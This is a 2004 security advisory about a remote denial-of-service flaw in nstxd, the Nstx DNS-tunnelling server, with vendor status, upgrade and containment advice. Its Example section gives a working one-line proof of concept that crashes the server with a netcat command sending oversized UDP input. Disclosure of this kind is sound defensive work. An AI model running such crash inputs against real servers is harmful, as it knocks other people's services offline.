---------------------------------------------------------------------- Rstack Team (Rstack.org) --- Security Advisory Advisory Number: RSTACK-20040325 Subject: Nstxd remote DoS-Bug (NULL-pointer-dereference) Author: Laurent Oudot Discovered: ... Published: March 25, 2004 ---------------------------------------------------------------------- Problem description =================== Nstxd is the server from the Nstx project. Nstx can be used to create IP trafic over DNS (can be used by blackhats for special Wifi networks with DNS open for everybody). Unexpected input may crash the server called nstxd which will at least result in a DOS due to a NULL-pointer-dereference. The service nstxd runs as root to bind the UDP port 53. Vulnerable versions =================== Tests were done with the latest version : nstx-1.1-beta3 http://debmail.dereference.de/nstx/nstx-1.1-beta3.tgz Vendor status ============= The Nstx team quickly solved this bug. A new release is available : nstx-1.1-beta4. >From the ChangeLog : 1.1-beta4: sky 2004/03/26 * Fixed a remote DoS-Bug (NULL-pointer-dereference) Solutions ========= * Upgrade your Nstx version at : http://debmail.dereference.de/nstx/nstx-1.1-beta4.tgz * Workaround: Containment (chroot, jail...) and low level security solutions (grsecurity, systrace...) should be use to improve the security of such a server. Example ======= ** On the server (assume the IP is 192.168.1.34 for this example): nstx-1.1-beta3# ./nstxd tun.mydomain.com ** On a remote "evil" client: remote-hacker$ perl -e '{ print "A" x 500 }' | nc -u 192.168.1.34 53 This will segfault the server. It might be dangerous as nstxd needs root priviledges (bind port 53). No exploit to get a remote shell has been reported (just a DOS). ---------------------------------------------------------------------- Copyright (c) Rstack Team This document is copyrighted. It can't be edited nor republished without explicit consent of Rstack Team. For more informations, feel free to contact us. http://www.rstack.org/ ----------------------------------------------------------------------